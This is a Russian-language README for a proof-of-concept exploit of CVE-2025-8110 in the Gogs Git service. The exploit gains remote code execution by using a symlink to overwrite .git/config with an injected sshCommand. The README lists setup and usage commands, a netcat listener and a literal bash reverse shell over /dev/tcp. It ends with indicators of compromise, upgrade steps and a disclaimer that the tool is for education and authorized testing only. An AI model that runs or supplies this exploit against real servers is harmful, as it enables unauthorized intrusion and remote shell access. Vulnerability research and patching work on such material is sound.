
Gogs RCE PoC - CVE-2025-8110
Доказательство концепции для CVE-2025-8110 — удалённое выполнение кода в Gogs через обход символической ссылки и внедрение sshCommand.
Этот эксплойт использует обход символической ссылки в API Gogs, чтобы перезаписать .git/config и внедрить вредоносный sshCommand, который выполняет обратную оболочку.
git clone https://github.com/X4BROZER/CVE-2025-8110.git
cd CVE-2025-8110
pip install -r requirements.txt
Аргумент Описание -u, --url Целевой URL Gogs (например, http://target:3000) -U, --username Имя пользователя Gogs -P, --password Пароль Gogs -t, --token API-токен Gogs -lh, --host Ваш IP для обратной оболочки -lp, --port Ваш порт для прослушивателя -x, --proxy Включить прокси (localhost:8080)
Войдите в Gogs → Настройки → Приложения → Создать токен
nc -lvnp 4444
python3 exploit.py -u http://target:3000 -U <USERNAME GOGS> -P <PASSWORD GOGS> -t <TOKEN> -lh <ATTACKER IP> -lp <ATTACKER PORT>
python3 exploit.py -u http://localhost:3001 -U amine -P amine -t 44f4e64a1e6353f247050055aa0d3cc13b577ac3 -lh 10.10.17.134 -lp 4444
Создаёт репозиторий с символической ссылкой на .git/config
Использует API PutContents для записи в символическую ссылку
Внедряет sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #
Gogs выполняет команду → обратная оболочка
Устранение неполадок Проблема Решение Не удалось войти Проверьте имя пользователя/пароль Не удалось создать репозиторий Перегенерируйте API-токен Таймаут чтения Нормально — проверьте прослушиватель Нет оболочки Проверьте файрвол, попробуйте другой порт Индикаторы компрометации Случайные имена репозиториев из 8 символов
Символическая ссылка malicious_link в репозиториях
sshCommand в .git/config
Устранение уязвимости Обновитесь до Gogs v0.13.4 или новее:
wget https://dl.gogs.io/v0.13.4/gogs_v0.13.4_linux_amd64.tar.gz
tar -xzf gogs_v0.13.4_linux_amd64.tar.gz
Правовое предупреждение Этот инструмент предназначен только для образовательного и авторизованного тестирования. Несанкционированный доступ является незаконным.
Авторы Обнаружение: Wiz Research
Оригинальный PoC: zAbuQasem
Эксплойт: X4BROZER